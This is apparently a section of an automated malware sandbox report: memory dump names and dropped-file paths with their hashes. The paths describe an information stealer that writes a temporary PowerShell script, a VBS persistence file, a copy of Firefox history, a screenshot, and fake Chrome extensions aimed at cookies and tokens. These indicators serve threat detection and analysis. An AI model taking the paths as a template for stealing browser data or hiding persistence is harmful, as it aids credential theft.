memory/10752-929-0x00000215A9210000-0x00000215A9220000-memory.dmp

memory/3936-930-0x0000014849010000-0x0000014849020000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cK6J4I8K7LyV_temp.ps1

MD5 fff8f14e33f3e7d4655f4c9c8962b712
SHA1 aad7768cc2e45e781945f6865eb493890b8e56cc
SHA256 6750d53f1f50f62d994c1ff64800e1bdc0136e4da33c36fd33ae0685c0e1402b
SHA512 527f0672619449b8700ff2dbdc4f3087641d95d4fd2af6e347245400c58a6c3ea0d7104812f62ed272ccbd739148a0c708160cc7fe67c11a0ef8dd5a0d2ab26e

memory/10580-1019-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

memory/10580-1024-0x0000020A986B0000-0x0000020A986C0000-memory.dmp

memory/10580-1026-0x0000020A986B0000-0x0000020A986C0000-memory.dmp

memory/10752-1032-0x00000215A9210000-0x00000215A9220000-memory.dmp

memory/10752-1037-0x00000215A9210000-0x00000215A9220000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0444ba85a380233af934d0f895424015
SHA1 099a17ffcce1df7db5f07209cfb4ab4571dbd891
SHA256 5ac4b5396a338d7d8a363c4461da534d88dc0bb1c6bed200ebd44e54e874c818
SHA512 fcbe5f1116601aa955c5a9658ab0ea8a313370f75652fee0973d8a679523cb356af5390a0d9ae867ffe98f6985ff3d19914a2ef8842fdbf57266731d7d35f4d0

memory/9616-1041-0x0000024AB3230000-0x0000024AB3240000-memory.dmp

memory/3936-1049-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

memory/10668-1050-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

memory/10668-1059-0x00000186EED80000-0x00000186EED90000-memory.dmp

memory/9616-1048-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 27bb0eda7a61e837cf5bee5803cf7f28
SHA1 a2f019afa24253ad9ec9798954ac324fbf97577a
SHA256 e39550f7ede651c50ee9c26b0e03cdfcab96d5b65a3a8e2cd338354cc1475818
SHA512 251d83b1f1d14dc246bb5d54a5ed98eb1465ed4c27671576e316d677c9ef8f4417e50835973dcf9dccb5377062e9fc7ea21b61c2d32886f3aac21197204f17d4

memory/10668-1064-0x00000186EED80000-0x00000186EED90000-memory.dmp

memory/10668-1065-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 71f4828f4dd445e9d3cbf2028b53bf4e
SHA1 2e6c27805e51bfb3f00e5d05cc6ca6abbe2d7e72
SHA256 f80d5826958b01d9f1135f4979bb1706fcc11197b3ace102028ea34acc1a888a
SHA512 a775d7103336db398519a149ae385fecf63dfee4e2faccf0f691e93c5d86d49e47b1ee89f63d3da7400d2a27f4516980936603e4b4066fe51f9cc5c57f34eca2

memory/10580-1075-0x0000020A986B0000-0x0000020A986C0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9c3ef26bef346a94a0cbcdb40c2f256f
SHA1 85c558eb1ead899fd2e1bfedf0a0349aac6b674d
SHA256 601c9c3cddba932536c911c171eef3592452ed9b106ed05c3a984c2df8a2598e
SHA512 9b9eb66ff64c9fbefa9d8a09156cffe565d809c0af31513921d4624973ff786c07844be8421d4048b0821969e68ddebc5fdfd9125f693acb30a21b0cbd208a7b

memory/10752-1079-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

memory/10580-1081-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

memory/3444-1080-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 42233a46911e8937581f18d6cbd271f8
SHA1 08d32b99817ee23f3f2522be03470db1da4d9f18
SHA256 b630ab85a8d32d363d3167340b0922a7661c929a6f6464fd70bf432602a11108
SHA512 54dac19443ee873fa28b8d295cc1016b43a64be74aa95c2a4808deb11530ef35e7422c8b532c7dbb13a1a08f42e234e1c071f2ab87a2fd0b8ebfbb2e297f7030

memory/3444-1089-0x000001F053C30000-0x000001F053C40000-memory.dmp

memory/3444-1090-0x000001F053C30000-0x000001F053C40000-memory.dmp

memory/3444-1092-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

memory/3444-1091-0x000001F053C30000-0x000001F053C40000-memory.dmp

memory/10884-1096-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

memory/10884-1098-0x00000291FA930000-0x00000291FA940000-memory.dmp

memory/10884-1099-0x00000291FA930000-0x00000291FA940000-memory.dmp

memory/10884-1119-0x00000291FA930000-0x00000291FA940000-memory.dmp

memory/10884-1120-0x00000291FA930000-0x00000291FA940000-memory.dmp

memory/10884-1124-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lo9wvv8t.default-release\places.sqlite_tmp

MD5 b6c04d7a16d3ddad3b9dcbcfe9bf4a6f
SHA1 9442a94450ee1f24229305021d4a91c126ae26d0
SHA256 60153e23e69dafc23724eeccae44c0ecb44b6dad9225e28d8b4092b692fa7dcb
SHA512 da4aa7c364db61e71d56a4069fd303d5af90218939d0b982efa0d72f4a84088af14b4a72674982bcd245abcb18408bce1d07ec49b0c30c40c2bbec37c9e8e5dc

C:\Users\Admin\AppData\Local\Temp\huu7RDdSFYaYZGXRkRDj\System\OHDSYZPD - 2023-12-20_085017.png

MD5 e562984206be542024301de0a0c203c9
SHA1 05282d1c30e282da9b8d54705b1939e44bc1e018
SHA256 3030a5cd10ee728295be5b45703ae09dca8c8c5d237395530fd578e27e8facfb
SHA512 0688f224d8c7f345dbaccce8f8b3749043c44c7e948b9c6504235a58f3fb58a9941f83eee280d35a67aec2a29a2d7bf799561eaacaed47e4188e3a8a3b7c48bc

memory/3572-1187-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

memory/3572-1188-0x0000016970600000-0x0000016970610000-memory.dmp

memory/3572-1190-0x0000016970600000-0x0000016970610000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 514ca136ac131d77f9ff11da08a74472
SHA1 758d340f919aa024d7a0ff7d3110345c4161c968
SHA256 3ccc0b084dc85c100ede7776cfc1b556e8fd1914c0352809199f3f1ee3e83a78
SHA512 3f35593d1715eae7b82b4d696044b71410fd20735b42036af39ed37a787445eec4c32a52801385db744112a990329fbd519fd3967476ff507190081b3c56bf06

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_FC5uoY.vbs

MD5 47ad61e8c0752955fab5e320f16ec7c5
SHA1 62eebf8c40228427505b6b6d744e9a4a0f6bdc35
SHA256 e9821bd5a834455d7fb705a7b41b8909b59660fdcfc4b428537cfa3fa9279543
SHA512 0aa1601a633034a2e176a43ae85f84b3150674be14ae7ab257f98c59686bbd467d66b600c75c6ab09dbeadc4b175b324661506302237036a4fe84ca903e18a92

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo.png

MD5 2b67e47cb8da1058770fe41d8b947619
SHA1 9eb259b1d377a24a2b77a694cf31c23cef7b8eef
SHA256 46f616820751849512d2704ddb604666170d13315c4383b8c8611c3e1c2f594a
SHA512 27c0593d662df228e146c49af6da52e39523523af924cf95ba4890b1b42358b2b8df3cf2667d8f672eece4f7fe098574c4689677768dd54d3b872619c7b9ae55

C:\ProgramData\ChromeExtensionsNova\extension-cookies\manifest.json

MD5 04c23766134b234e85cc537b2162efb1
SHA1 45c48d9ca30a4580a682f025cc66331e49f6f158
SHA256 f50f62683347bbca52d7f7de0c877014ae77043753905628644e2d485dfb4900
SHA512 d246f59ad6d6e9fc8d8d88129302d55cb3d2ba7d52496915ee6791fa0576153070af76ea689cc74ccefc36456df749ac5c8f45cb12702961470f202078bfcb3c

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo16.png

MD5 192e90432fed0081abb25295d8f309c4
SHA1 5150e93061f39e26688afd60a04c0ab14b510d47
SHA256 3216d6864b4f8824b82eb887edf95436dac3bea3f7d43d8988a176e3f1f8e1b2
SHA512 9b9b3f85eb9f12ad1b4c8cfc5e672758d879e178179deb28e80e6c3b27871261bf6b52f9066850b5a7a2fd85012b5308eaf3dda882fa40febc9cf6b47f1a4f04

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo48.png

MD5 9f74f11972c3c0b161832ffab541bf31
SHA1 e5841ba20a229cdeab85d30690509e649e848271
SHA256 8b74a0abdd566ffdf15891d6abd3537bffb0abce7f362c737c3de6752e136032
SHA512 b90f13eb65a4dcfdd596a7d9eba7c1ba5eb1a598e51107ce3dca07c0a0025469ab18c9958eff2b36f7e05a23f0d16d7d9d7c2321b8e1f2a456aaa7bec3ced0e8

C:\ProgramData\ChromeExtensionsNova\extension-tokens\js\jquery-3.5.1.min.js

MD5 9ac39dc31635a363e377eda0f6fbe03f
SHA1 29fa5ad995e9ec866ece1d3d0b698fc556580eee
SHA256 9a2723c21fb1b7dff0e2aa5dc6be24a9670220a17ae21f70fdbc602d1f8acd38
SHA512 0799ae01799707b444fca518c3af9b91fda40d0a2c114e84bc52bd1f756b5e0d60f6fd239f04bd4d5bc37b6cdbf02d299185cd62410f2a514a7b3bd4d60b49fc

C:\ProgramData\ChromeExtensionsNova\extension-tokens\manifest.json

MD5 42ac88deb5c3cfc02fdc1c27319ee067
SHA1 97b1addf35159800b90743fcfbb5505e80f6eb82
SHA256 28486361faff1827fb9f1871529c48efaaf86027592d189afa6f99b14eb3f4bb
SHA512 77c4054a3cf061eb6f4f6e9803b74833a8fb0fe352239b5b47cf39ea5eea8104b9da6deab75018557476fbda856f3be8d57e6fe2eb777c45a7a1bdb1e72d02d5